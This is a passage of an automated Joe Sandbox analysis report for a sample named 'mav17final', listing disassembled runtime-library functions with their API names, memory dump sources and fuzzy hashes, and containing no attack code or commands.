                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _fread_nolock
                                                  • String ID:
                                                  • API String ID: 840049012-0
                                                  • Opcode ID: 29a2ea509154e8c5b7c4aa25aa57df5b74ef385b665b2ef91008b6d7940fe1b6
                                                  • Instruction ID: 5edde754482dbe71b94f5ba74002eb66a1189f88f8ddf49de21effd7d4749e96
                                                  • Opcode Fuzzy Hash: 29a2ea509154e8c5b7c4aa25aa57df5b74ef385b665b2ef91008b6d7940fe1b6
                                                  • Instruction Fuzzy Hash: 6F21B421B09A5251FA60AB326484BBAE651FF45BE4FC84030FE1D0BB96EE3CE4058730
                                                  Function 00007FF79EA57150 Relevance: 1.6, APIs: 1, Instructions: 74COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: d4d86f90d8beb46fa78844947a245e75cb60c67ce083d1104130f5490f9c3730
                                                  • Instruction ID: 7715cc1f69ed2440e64e19362ece11d02e463b90b0384d728c207936eca0718f
                                                  • Opcode Fuzzy Hash: d4d86f90d8beb46fa78844947a245e75cb60c67ce083d1104130f5490f9c3730
                                                  • Instruction Fuzzy Hash: 2F318171A0860285E7617B7598C1B7CB691EFA4BA4FD50935F92D037F2CFBCA8418630
                                                  Function 00007FF79EA584CC Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 383498e7d7e8b1fd9c533886b1d220b4cf7c947b4f241dd423aa0ce12a2c112c
                                                  • Instruction ID: ca8b8cf662b67024a9389f64639997c5e3b48d62d27a9e371bf2c0591e080858
                                                  • Opcode Fuzzy Hash: 383498e7d7e8b1fd9c533886b1d220b4cf7c947b4f241dd423aa0ce12a2c112c
                                                  • Instruction Fuzzy Hash: 4D21BC62E08642A5E6A1BF35A881B3CB650EF94BB4FA50535E91D073F2CE7CE8408730
                                                  Function 00007FF79EA57830 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f919bf4118337ab7005c2370826db1eca15be1b08004282f148695719f6a1285
                                                  • Instruction ID: 08e633aeea830a776948353d72390a65d556ca9742d0ce4ed1a1f21c17ef9c9f
                                                  • Opcode Fuzzy Hash: f919bf4118337ab7005c2370826db1eca15be1b08004282f148695719f6a1285
                                                  • Instruction Fuzzy Hash: 2621AB22E0864685E6A1BF35A8C0B3DB650EB54BB4F950634E92D177F2CE3CE8808730
                                                  Function 00007FF79EA52398 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: ebf05c5c15a6287f42340a9c97fbfd395419422103ca14e3514fddc8112de4d0
                                                  • Instruction ID: 27a4cb05a3b213b0a5f30d680cbe90d63f3f4573f452a90103e6cea232a3669c
                                                  • Opcode Fuzzy Hash: ebf05c5c15a6287f42340a9c97fbfd395419422103ca14e3514fddc8112de4d0
                                                  • Instruction Fuzzy Hash: B6115421A1C64281EA70BF619481A7DF2B0EF99B90F844431EA4D57AB6DF3CD5008770
                                                  Function 00007FF79EA61E6C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 229554744694565c2a4a2fec6a2ad75b3c1a518c1cb3db7dfb8ece73082232fd
                                                  • Instruction ID: f36209be3bc941855b96f5a033140967e7a8c1e1a0d04b1e429bdac5314c0d07
                                                  • Opcode Fuzzy Hash: 229554744694565c2a4a2fec6a2ad75b3c1a518c1cb3db7dfb8ece73082232fd
                                                  • Instruction Fuzzy Hash: 1D216532A08A4286DB71AF28D480B7DB6A0EBA5F54FA44235E65D476F5DF3DD8018B20
                                                  Function 00007FF79EA559E0 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                  • String ID:
                                                  • API String ID: 3947729631-0
                                                  • Opcode ID: 6145c07282da4ab71bd663fb52be7bd64ecc08ec8f7fbd1fc40330876fe3f1ac
                                                  • Instruction ID: ab6f3ec46a2c4883947287df1408bf1c0f5ba8f7cf2aa0b69c50b902f72b154a
                                                  • Opcode Fuzzy Hash: 6145c07282da4ab71bd663fb52be7bd64ecc08ec8f7fbd1fc40330876fe3f1ac
                                                  • Instruction Fuzzy Hash: 5E214F72A04782C9EB21AF74C8C86FC77A0EB44708F944536D70D06A95DF3CD585CB60
                                                  Function 00007FF79EA4E1E8 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: aac75a52ae55397d5cc9251cf9dad856d9fae640d00391b7cd0f4382f17b93b4
                                                  • Instruction ID: 6af8b892e95156a7e18a27670fd35907e523f826512d5e8a79eaadcb45b2e956
                                                  • Opcode Fuzzy Hash: aac75a52ae55397d5cc9251cf9dad856d9fae640d00391b7cd0f4382f17b93b4
                                                  • Instruction Fuzzy Hash: E701A521B08B5141EA64AB72594057DE794FB95FE0FD88634DE5C67BE6DE3CD1014320
                                                  Function 00007FF79EA536C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 5164a71c67db4dfe3c27ffd29dad53400bca74fbb9257fdd2bea829eec474a6b
                                                  • Instruction ID: a8c823f7c2ac82de4ea70234167827788ee35a2d988e3875ffbb0b1ead3749da
                                                  • Opcode Fuzzy Hash: 5164a71c67db4dfe3c27ffd29dad53400bca74fbb9257fdd2bea829eec474a6b
                                                  • Instruction Fuzzy Hash: 17119A60E0DA0244F970BB32698197EE6D4EFD0BA0F940239E91D46BFBCE2CE4458630
                                                  Function 00007FF79EA568E4 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8155fc7d56cf343aee1c57a6ce9c3926f3a2de1a15dd65c693b488225a7edbf2
                                                  • Instruction ID: 1adea7571fa57af8e14863c84bca4bb1b8c67a702905c7be07b1f516fc064950
                                                  • Opcode Fuzzy Hash: 8155fc7d56cf343aee1c57a6ce9c3926f3a2de1a15dd65c693b488225a7edbf2
                                                  • Instruction Fuzzy Hash: D4119A72908A46C9EB60AF64D4806BCF7A0EBE4764FD04232E25D026B5CF7CE1048B31
                                                  Function 00007FF79EA4DE28 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 3f1875fcf3292ebc0abdad29f8a83a022598266a53ac0d4e6476cd0d3a24a952
                                                  • Instruction ID: e44527b7ea10a7bc4a2a946c4d5e0a6c4a2bb739ba40dbcefb923de819d252c9
                                                  • Opcode Fuzzy Hash: 3f1875fcf3292ebc0abdad29f8a83a022598266a53ac0d4e6476cd0d3a24a952
                                                  • Instruction Fuzzy Hash: 9F018F21E1950285FE74BB7598D2B7C9290DFD5B74FA41331E92A862F3DE2CE8008330
                                                  Function 00007FF79EA4E6F0 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: b2bd31d8148823757d1cdd1794ac4485a81cd9419a20a54f306ea94e416d07c1
                                                  • Instruction ID: 09af918b9145b983799f2c27716ce0faed9c24bb2d10ff3705b4b648ffc4f649
                                                  • Opcode Fuzzy Hash: b2bd31d8148823757d1cdd1794ac4485a81cd9419a20a54f306ea94e416d07c1
                                                  • Instruction Fuzzy Hash: A1011E72B00B1698EB11DFB0D4808EC77B8FB24798B944535DA4C17B65EF34D2A5C3A0
                                                  Function 00007FF79EA5A6A8 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF79EA59809,?,?,00000000,00007FF79EA51385,?,?,?,?,00007FF79EA56855), ref: 00007FF79EA5A6FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: e1e521c9b2ba9996a291680bfc6f593a9bf57ec62e45b01cf424f45e8760f50e
                                                  • Instruction ID: 3776b05df23301e3a4814153eb1643bd41f68ae9a56ee74eb669bc7204acd2d6
                                                  • Opcode Fuzzy Hash: e1e521c9b2ba9996a291680bfc6f593a9bf57ec62e45b01cf424f45e8760f50e
                                                  • Instruction Fuzzy Hash: 17F06214B0960351FE7477715890ABDD290EF58B80FC84435CD0E867F1ED5CE4454630
                                                  Function 00007FF79EA4E290 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 2ad25243953c9a02ca10b9054c2eedea246f18d1ab88f9bce38db8b8bc417fba
                                                  • Instruction ID: 8d7b8b45b8cb5819569c9a62fd46624b2d6b815578b8465611993aa0a9baf186
                                                  • Opcode Fuzzy Hash: 2ad25243953c9a02ca10b9054c2eedea246f18d1ab88f9bce38db8b8bc417fba
                                                  • Instruction Fuzzy Hash: 6EF09621F08A4241EA60BB75A48147DE254DF95BE0F985530F65D47BE6DD6CD4414730
                                                  Function 00007FF79EA4DEAC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 7fa6522447286bef44e2041a239f01c2dc9c274788e9281e99a64b14b5142831
                                                  • Instruction ID: 7661d3ebd0348fd550d0c97be3bda151aba7bd2d4419fa9d0b61a58ddceb74dd
                                                  • Opcode Fuzzy Hash: 7fa6522447286bef44e2041a239f01c2dc9c274788e9281e99a64b14b5142831
                                                  • Instruction Fuzzy Hash: 48F08221A0C90385F974BB79A4C2A7DA290DFA5794FD81630F61E866F3EF2CE4418731
                                                  Function 00007FF79EA58C00 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF79EA51577,?,?,?,?,?,?,?,00007FF79EA4290B), ref: 00007FF79EA58C3E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 6f2a4ad9f512a4c2bcba360b399d629d2b166f315522859e6d59b16541e63fe7
                                                  • Instruction ID: 024a0a6ee17b1bd70b2f01dbc80dd831cb98869453be293267682f34e1a35273
                                                  • Opcode Fuzzy Hash: 6f2a4ad9f512a4c2bcba360b399d629d2b166f315522859e6d59b16541e63fe7
                                                  • Instruction Fuzzy Hash: C9F0F810F0A64755FE7877B159C1A7DA580DFA9BB1F884630DD2E862F1DE2CA4814A34
                                                  Function 00007FF79EA54750 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: edf159b7b19ce31d504abb84e2344a46a629cce5a9b772ee81c428513dd29d6c
                                                  • Instruction ID: dbb7c30e82881e89ff686b2ac429b49f4c3a141b839599cb068de93e4a1c132c
                                                  • Opcode Fuzzy Hash: edf159b7b19ce31d504abb84e2344a46a629cce5a9b772ee81c428513dd29d6c
                                                  • Instruction Fuzzy Hash: 7EE06D20A0CA4245EE64BBB6A58597DA150DF96BF0FC41B34EA3E067F3DE2CA0508730
                                                  Function 00007FF79EA53A04 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 5131db3b9d397febd42fe8dcaac256292aabfb728f08fa2f2e4777bcacc41136
                                                  • Instruction ID: a526673a9d000de5d54e59418d7586c4acdc6157ff618549bfe7fe5acdf7cff0
                                                  • Opcode Fuzzy Hash: 5131db3b9d397febd42fe8dcaac256292aabfb728f08fa2f2e4777bcacc41136
                                                  • Instruction Fuzzy Hash: 9CE0EC64E096074AF6743BB449C2D7DF190CFA8390F844474EB09062F7DD1D68585631
                                                  Function 00007FF79EA56830 Relevance: 1.5, APIs: 1, Instructions: 14threadCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: LanguagesPreferredRestoreThread
                                                  • String ID:
                                                  • API String ID: 1765668137-0
